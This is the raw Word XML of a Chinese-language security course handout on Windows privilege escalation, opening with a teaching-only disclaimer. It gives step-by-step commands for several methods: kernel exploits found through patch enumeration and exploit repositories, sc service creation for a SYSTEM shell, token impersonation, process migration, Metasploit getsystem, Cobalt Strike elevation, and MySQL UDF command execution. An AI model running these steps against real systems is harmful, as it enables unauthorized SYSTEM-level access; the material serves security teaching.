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免责声明： </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/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本课程内容仅限于网络安全教学，不得用于其他用途。任何利用本课程内容从事违法犯罪活动的行为，都严重违背了该课程设计的初衷，且属于使用者的个人行为与讲师无关，讲师不为此承担任何法律责任。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/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希望同学们知法、懂法、守法，做一个良好公民。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/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bidi w:val="0"/>
        <w:jc w:val="center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Windows提权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系统内核溢出漏洞提权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此提权⽅法即是通过系统本身存在的⼀些漏洞，未曾打相应的补丁⽽暴露出来的提权⽅法，依托可以提升权限的EXP和它们的补丁编号，进⾏提升权限。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</w:rPr>
        <w:t>查找补丁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a. 手工查找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systeminfo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41695" cy="3856990"/>
            <wp:effectExtent l="0" t="0" r="1905" b="1397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wmic qfe get Caption,Description,HotFixID,InstalledOn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1421130"/>
            <wp:effectExtent l="0" t="0" r="3810" b="11430"/>
            <wp:docPr id="2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b. MSF扫描</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="default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首先利用永恒之蓝取得session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 xml:space="preserve">use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post/windows/gather/enum_patches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5939790" cy="3745230"/>
            <wp:effectExtent l="0" t="0" r="3810" b="3810"/>
            <wp:docPr id="31" name="图片 31" descr="db4cf5b4ecd74455ca13ce6cd28f6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db4cf5b4ecd74455ca13ce6cd28f69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</w:rPr>
        <w:t>查找</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>利用工具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使用Windows提权辅助页https://i.hacking8.com/tiquan/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5125720"/>
            <wp:effectExtent l="0" t="0" r="3810" b="10160"/>
            <wp:docPr id="2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2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进一步进行过滤，并下载payload尝试提权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也可以到 https://github.com/SecWiki/windows-kernel-exploits 下载payload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914650"/>
            <wp:effectExtent l="0" t="0" r="3810" b="11430"/>
            <wp:docPr id="1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经过测试，CVE-2017-0213 能够提权。该程序不能直接返回高权限shell，会弹出一个新的DOS窗口。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4182745"/>
            <wp:effectExtent l="0" t="0" r="3810" b="8255"/>
            <wp:docPr id="1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系统命令提权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在低版本系统中，如Windows 2000、Windows 2003、Windows XP 可以使用at命令提权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在高版本系统中，可以使用sc命令提权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t>Service Control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）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创建⼀个名叫 syscmd 的新的交互式的 cmd 服务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sc Create syscmd binPath= “cmd /K start” type= own type= interact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5044440"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="2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启动该服务，得到了⼀个 system权限的cmd环境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sc start syscmd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3723005"/>
            <wp:effectExtent l="0" t="0" r="3810" b="10795"/>
            <wp:docPr id="2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令牌窃取提权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令牌(token)是系统的临时秘钥，相当于账号和密码，⽤来决定是否允许这次请求和判断这次请求是属于哪⼀个⽤户的。它允许你在不提供密码或其他凭证的前提下，访问⽹络和系统资源，这些令牌将持续存在于系统中，除⾮系统重新启动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MSF中内置incognito工具可以进行令牌窃取。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use incognito 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#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使用该模块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list_tokens -u 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#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查看所有令牌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impersonate_token “NT AUTHORITY\SYSTEM” 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#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窃取令牌,最好是双反斜杠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4123690"/>
            <wp:effectExtent l="0" t="0" r="3810" b="6350"/>
            <wp:docPr id="18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进程迁移提权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使用MSF的ps命令可以查看当前所有进程的情况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606675"/>
            <wp:effectExtent l="0" t="0" r="3810" b="14605"/>
            <wp:docPr id="25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使用migrate命令选择x64和高权限的进程进行迁移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905760"/>
            <wp:effectExtent l="0" t="0" r="3810" b="5080"/>
            <wp:docPr id="29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工具一键提权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5.1 使用MSF的getsystem命令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1238250"/>
            <wp:effectExtent l="0" t="0" r="3810" b="11430"/>
            <wp:docPr id="26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5.2 使用MSF的post/multi/recon/local_exploit_suggester模块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a. 扫描提权漏洞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u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se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post/multi/recon/local_exploit_suggester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240915"/>
            <wp:effectExtent l="0" t="0" r="3810" b="14605"/>
            <wp:docPr id="3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 xml:space="preserve">b. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>利用提权</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞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3622675"/>
            <wp:effectExtent l="0" t="0" r="3810" b="4445"/>
            <wp:docPr id="27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5.3 使用Cobalt Strike 进行提权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a. 启动CS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395220"/>
            <wp:effectExtent l="0" t="0" r="3810" b="12700"/>
            <wp:docPr id="16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b. 加载插件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356485"/>
            <wp:effectExtent l="0" t="0" r="3810" b="5715"/>
            <wp:docPr id="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c. 上线Administrator权限的win7（会话间隔时间0）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753995"/>
            <wp:effectExtent l="0" t="0" r="3810" b="4445"/>
            <wp:docPr id="13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d. 右键 -&gt; 凭证提权 -&gt; 权限提升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4146550"/>
            <wp:effectExtent l="0" t="0" r="3810" b="13970"/>
            <wp:docPr id="14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e. 也可以使用插件中的工具提权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4311650"/>
            <wp:effectExtent l="0" t="0" r="3810" b="1270"/>
            <wp:docPr id="7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6、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据库提权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在获得数据库权限后，不同的数据库有不同的方法去提升到系统权限，这里以MYSQL为例。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MYSQL提权有多种方法，比如UDF提权、MOF提权、WebShell提权等，这里以UDF提权为例。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UDF (user defined function)，即用户自定义函数。是通过添加新函数，对MySQL的功能进行扩充。如果添加的是系统命令的函数，则可以利用该函数执行系统任意命令，达到提权的目的。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通过python将MSF下的dll文件传给目标系统</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val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cd /usr/share/metasploit-framework/data/exploits/mysql</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="default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python3 -m http.server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1828800"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="8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把dll文件放入对应的目录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当 MySQL&lt; 5.1 版本时，将.dll 文件导入到 c:\windows 或者 c:\windows\system32 目录下。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当 MySQL&gt; 5.1 版本时，将.dll 文件导入到 MySQL Server 5.xx\lib\plugin 目录下 (lib\plugin目录默认不存在，需自行创建，可用NTFS ADS流模式突破进而创建文件夹)。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896870"/>
            <wp:effectExtent l="0" t="0" r="3810" b="13970"/>
            <wp:docPr id="9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配置secure_file_priv为空，使MySQL具有读写权限（重启MySQL）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5181600"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="10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4259580"/>
            <wp:effectExtent l="0" t="0" r="3810" b="7620"/>
            <wp:docPr id="11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创建cmd function，创建好的函数在mysql.func表中可以看到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create function sys_eval returns string soname ‘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lib_mysqludf_sys_64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.dll’;</w:t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1323975"/>
            <wp:effectExtent l="0" t="0" r="3810" b="1905"/>
            <wp:docPr id="12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使用函数可以执行系统命令</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/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select sys_eval(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>‘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whoami</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>’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);</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/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939790" cy="2597785"/>
            <wp:effectExtent l="0" t="0" r="3810" b="8255"/>
            <wp:docPr id="15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cwMTc3Zjc2ZTUwNjRlMGYyNmQ2YmNkYTdmNDNkY2QifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00000000"/>
    <w:rsid w:val="010435A8"/>
    <w:rsid w:val="01914632"/>
    <w:rsid w:val="0411346B"/>
    <w:rsid w:val="04745EB1"/>
    <w:rsid w:val="05635319"/>
    <w:rsid w:val="09793B73"/>
    <w:rsid w:val="098047A9"/>
    <w:rsid w:val="09C7321B"/>
    <w:rsid w:val="0B695340"/>
    <w:rsid w:val="0C822BB5"/>
    <w:rsid w:val="0CD50A5F"/>
    <w:rsid w:val="0FC55A86"/>
    <w:rsid w:val="10C93342"/>
    <w:rsid w:val="114A0E7B"/>
    <w:rsid w:val="11570F29"/>
    <w:rsid w:val="1221241B"/>
    <w:rsid w:val="127E28E2"/>
    <w:rsid w:val="12CE1E35"/>
    <w:rsid w:val="13352CE1"/>
    <w:rsid w:val="13A55A1C"/>
    <w:rsid w:val="13C627F3"/>
    <w:rsid w:val="13D440B7"/>
    <w:rsid w:val="150F7126"/>
    <w:rsid w:val="15460DEA"/>
    <w:rsid w:val="157D1577"/>
    <w:rsid w:val="167C0D2B"/>
    <w:rsid w:val="1697343C"/>
    <w:rsid w:val="172B3BFE"/>
    <w:rsid w:val="193D7C76"/>
    <w:rsid w:val="1AA40EE6"/>
    <w:rsid w:val="1BB51EC1"/>
    <w:rsid w:val="1F890B7E"/>
    <w:rsid w:val="1F9749F8"/>
    <w:rsid w:val="1FA27791"/>
    <w:rsid w:val="209669C5"/>
    <w:rsid w:val="23DC40A3"/>
    <w:rsid w:val="24327D07"/>
    <w:rsid w:val="24C83C46"/>
    <w:rsid w:val="24D63974"/>
    <w:rsid w:val="283B39B4"/>
    <w:rsid w:val="2AA66B98"/>
    <w:rsid w:val="2D185BC2"/>
    <w:rsid w:val="2E283D2E"/>
    <w:rsid w:val="2F906DAB"/>
    <w:rsid w:val="2FDD7BBA"/>
    <w:rsid w:val="2FDE0572"/>
    <w:rsid w:val="2FE74788"/>
    <w:rsid w:val="2FF8610C"/>
    <w:rsid w:val="304D32BE"/>
    <w:rsid w:val="30A03AB3"/>
    <w:rsid w:val="31AE191D"/>
    <w:rsid w:val="31EE3E4C"/>
    <w:rsid w:val="32B37CAB"/>
    <w:rsid w:val="32BB68B9"/>
    <w:rsid w:val="339316C7"/>
    <w:rsid w:val="373A6B99"/>
    <w:rsid w:val="389B670D"/>
    <w:rsid w:val="3AD538EB"/>
    <w:rsid w:val="3CAD2526"/>
    <w:rsid w:val="3D504CF4"/>
    <w:rsid w:val="41580865"/>
    <w:rsid w:val="43FF3554"/>
    <w:rsid w:val="45C5024D"/>
    <w:rsid w:val="45D773FA"/>
    <w:rsid w:val="467806FB"/>
    <w:rsid w:val="48B80A32"/>
    <w:rsid w:val="4CC1510F"/>
    <w:rsid w:val="4CED2167"/>
    <w:rsid w:val="4CF32097"/>
    <w:rsid w:val="4EBF0626"/>
    <w:rsid w:val="4FF461D6"/>
    <w:rsid w:val="51021475"/>
    <w:rsid w:val="51894076"/>
    <w:rsid w:val="53A414A2"/>
    <w:rsid w:val="53D438C9"/>
    <w:rsid w:val="54401152"/>
    <w:rsid w:val="545A4CDB"/>
    <w:rsid w:val="55EC4969"/>
    <w:rsid w:val="5696214F"/>
    <w:rsid w:val="58B30533"/>
    <w:rsid w:val="5C816D6B"/>
    <w:rsid w:val="5CCC52A0"/>
    <w:rsid w:val="5D7B5F87"/>
    <w:rsid w:val="5DF97B7F"/>
    <w:rsid w:val="5E4D30F4"/>
    <w:rsid w:val="608F6263"/>
    <w:rsid w:val="623B0DD0"/>
    <w:rsid w:val="62930806"/>
    <w:rsid w:val="634E3149"/>
    <w:rsid w:val="63D074B3"/>
    <w:rsid w:val="63E421C2"/>
    <w:rsid w:val="6635628F"/>
    <w:rsid w:val="66B73B69"/>
    <w:rsid w:val="6A986D85"/>
    <w:rsid w:val="6BDA6675"/>
    <w:rsid w:val="6C1E16E9"/>
    <w:rsid w:val="6D1D2EAC"/>
    <w:rsid w:val="6DF7068A"/>
    <w:rsid w:val="6EB47D3A"/>
    <w:rsid w:val="6EB72172"/>
    <w:rsid w:val="73504D4A"/>
    <w:rsid w:val="756E3325"/>
    <w:rsid w:val="759909EB"/>
    <w:rsid w:val="76305A1C"/>
    <w:rsid w:val="76961CD3"/>
    <w:rsid w:val="76DA5393"/>
    <w:rsid w:val="77412895"/>
    <w:rsid w:val="78064D32"/>
    <w:rsid w:val="79AE42E2"/>
    <w:rsid w:val="79B06CD4"/>
    <w:rsid w:val="7ABC2DEA"/>
    <w:rsid w:val="7DEA3E2D"/>
    <w:rsid w:val="7EE540FF"/>
    <w:rsid w:val="7F0D0245"/>
    <w:rsid w:val="7F58436E"/>
    <w:rsid w:val="7FFD4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autoRedefine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autoRedefine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autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:b/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="10">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="8"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:i/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="11">
    <w:name w:val="标题 3 Char"/>
    <w:link w:val="4"/>
    <w:uiPriority w:val="0"/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2023-09-21T06:13:00Z</dcterms:created>
  <dc:creator>X</dc:creator>
  <cp:lastModifiedBy>踏雪折梅</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-01-19T08:43:42Z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4F64CD81384A438E859B2E84C2553F51_12</vt:lpwstr>
  </property>
</Properties>
</file>